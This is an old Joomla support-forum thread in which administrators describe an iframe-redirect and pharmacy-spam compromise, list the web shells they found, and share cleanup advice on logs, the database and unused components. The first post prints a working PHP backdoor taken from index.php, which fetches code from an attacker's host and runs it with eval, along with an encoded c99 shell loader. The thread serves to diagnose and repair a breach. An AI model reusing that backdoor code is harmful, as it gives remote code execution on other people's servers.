iframe injection ID Hack to Joomla

[ripplestone]

The Joomla site I work on has been hacked. After hours of research, and attempts to fix it, we are left with not knowing how it works, or how to stop it.

What is happening is certain content on the site sends the user to a completely different Spammer site, within an iframe. 100% width 100% height.
The iframe code is not simply sitting in some file, we have search all over for it...


More Information:
Joomla! 1.0.13 Stable (just upgraded to Joomla! 1.15 while trying to fix it)
Apache, PHP 4.4.7
MySQL 4.1.19

Host: Rackspace

3rd party extensions:
FireBoard 1.0.4
Community Builder: 1.1
Feed2post: 1.5
seyret: 0.2.7.8
Phil-A-Form v1.6.7

Backup: yes 1 week ago. But the hacker may have been tampering before then.

permissions: Folder permissions may have been tampered with. The hacker definately has some passwords

Additional Information:

We found and removed some code, that included a link to:
km20725. keymachine. de
keymachine .de

as well as some code that looks like this:

Code: Select all

eval(gzinflate(base64_decode('FZzHjqRaFkU/p9...............3//+Hw==')));

Also the following code was in the index.php

Code: Select all

if(isset($_GET['go'])) {
    $sock = @fsockopen('km20725.keymachine.de', 80);
    if($sock){
    fwrite ($sock, 'GET http://km20725.keymachine.de/server1/index.php?host='.$_SERVER['SERVER_NAME'].'&go='.$_GET['go'].' HTTP/1.0'."\r\n");
    fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
    while($content[] = fgets ($sock));
    $content = implode('', $content);
    @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
    fclose ($sock);}
}

Any help or information would be GREATLY appreciated!!!!!!!!

[ripplestone]

Google has found thousands of Spam entries on our site from the attack:
<EDIT Link Removed>

We have found and removed the following hacker tools installed on our
server:

sToRm7shell
C99madShell
k1b0rg Doorway Loader

We found that the "eval(gzinflate(base64_decode('FZzHjqRaFkU/p9...............3//+Hw==')));" code mentioned in the first post was encrypted PHP code for c99madShell

We have decided to re-load Joomla, and migrate the database.

While loading modules and plugins for the freshly installed joomla site, my PC desktop was hit by a virus. I do'nt know where the virus came from, but my computer wount boot up anymore.

Before it stopped being able to boot, multiple applications were running that were malicious. Including the following:

sysin.scr
vm ben2tali.exx
Command Service CMDService
rjwnw63m.exe

Firefox and IE kept poping up and trying to access:
(do not visit the following site)
antispyknight. biz/ 155

By that time i had already unplugged the internet.

We will continue to work repairing this attack, and post here again in the next few days.

[ripplestone]

We have successfully rebuilt the site. The Spam problem and iframe hack has been resolved.

I also had to re-load my desktop. I'll try Ubuntu for a while.

Something I didn't mention before:
The spammer was primarily using the keyword: [* spam *], and linked to a pharmacy directory.

The hacker was skilled, but his intentions were misguided. It's unfortunate that he wasted so much of his and our time.

"Force without wisdom falls of its own weight."
-- Horace (65 BC - 8 BC), Odes

[clubrob]

Having almost the exact problem on the two sites I maintain. Rebuilding the entire site is going to be a measure of last resort because there's so much data involved.

I've cleaned out all the bad code I could find, and I've been pouring over my php files for over a week and haven't found any more. But specific URLs are still redirecting, and I can't figure out how. I could really use some help here.

One site is using mod_rewrite, and one has it turned off. Both are having the iframe issue. Something I thought was interesting was if I escape the last ampersand in the URL (the one in the view&id=22 phrase) with & the browser goes to the proper page instead of redirecting.

Is there somewhere else that scripts could be running besides in the actual php files? On our DNS? In the database?

[mandville]

check your cron jobs also.. they may set it to reinfect..

[clubrob]

Thanks for the suggestion, mandville. I checked the cron jobs, and they look clean.

I learned from going through my apache logs that a main vulnerability was in an old extcalendar component that had never been deleted from the site (I'm new at this job, and I inherited kind of a mess). URL injection was occurring at an astonishing rate. I deleted that component (did I mention it wasn't even in use anymore? sheesh). And the hole seems to be plugged now.

The previous web administrators didn't appear to do anything to secure their joomla installations. I had to change the php.ini settings to the recommendations in the Joomla security forum. And many of the file and folder permissions were set incorrectly. Register globals was ON when I first gained access to the backend of these sites (my first clue that we were probably compromised). So I've been cleaning up a pretty bad mess.

As for my infected files, I found redirect scripts inserted in the main index.php, pathway.php, the template index.php, and in the editor/editor.php files. The scripts were both plain php and base_64 encoded. I also found stand-alone php files with what appeared to be random 5-character string file names. I think these were the c99madShell files. I found them in the images, media, and template folders. And in the main Joomla folder. They were all base_64 encoded. (Decoder for base_64 code: http://www.3dmobility.com/decrypt2.php Start from "eval" and include the semicolon at the end.)

Once I had the main holes plugged and the dangerous php functions switched off, I cleaned out all the malicious scripts and files. So far so good. All my sites are still using Joomla 1.0.15, and my next project will be migrating all three to 1.5. Hopefully I can hold the line until then.

The most useful tool in all this was pouring over apache logs. Look for any weird POST requests. Look for anyone trying to insert external URLs into your URLs.

Also, if malicious redirection is your problem, check every file that your main index.php includes. That's how I found the scripts in the editor.php file.

It's been a stressful first month at this new job!!!

[mandville]

sounds like good work, puts the old admin to shame!

[intrigue]

Also check out this if you have a lot of hidden code/redirect links injected into your home page with this sort of hack....

http://www.viddler.com/explore/jeradhill/videos/43/

The video helps you get rid of the text/code out of the page - its hidden in the page content but you'll have to remove it from the database. In some ways I think the other files on the server are meant to be decoys... as you end up hitting your head against the wall trying to find the files that are putting the hidden links in the page when its in the database instead. A bit of a mind f#%k

just my 2cents to the cause

[mandville]

if your site is hacked you have to check everywhere, who knows what they have done to your site.

[intrigue]

Totally agree Mandville, but that was covered quite nicely by others above.

What I was trying to point out is that I'd already done the run around to find the hacked files on the server but kept coming back to why there was hidden code still being injected into the homepage.... which was frustrating as you think that you've missed something on the server and keep going back to check which is super time consuming (especially when it turns out what you are chasing is not in the place you are looking).

Then I found this link (shown in my previous post) which highlighted that the injected code was in-fact completely separate from the hacked files on the server and was hidden in the DB instead....

Goes to show you need to look past the obvious sometimes... otherwise you end up going in circles.

[mandville]

Totally agree Mandville, but that was covered quite nicely by others above.

Goes to show you need to look past the obvious sometimes... otherwise you end up going in circles.

Exactly . this very old topic has been repeated in several places. and some people dont read beyond the first and last post.

Topic set to auto lock due to age

[yoomark]

I search google today for hacking of joomla and i found that.But i see this is for joomla 1.0 so i happy becoz i am using 1.5.18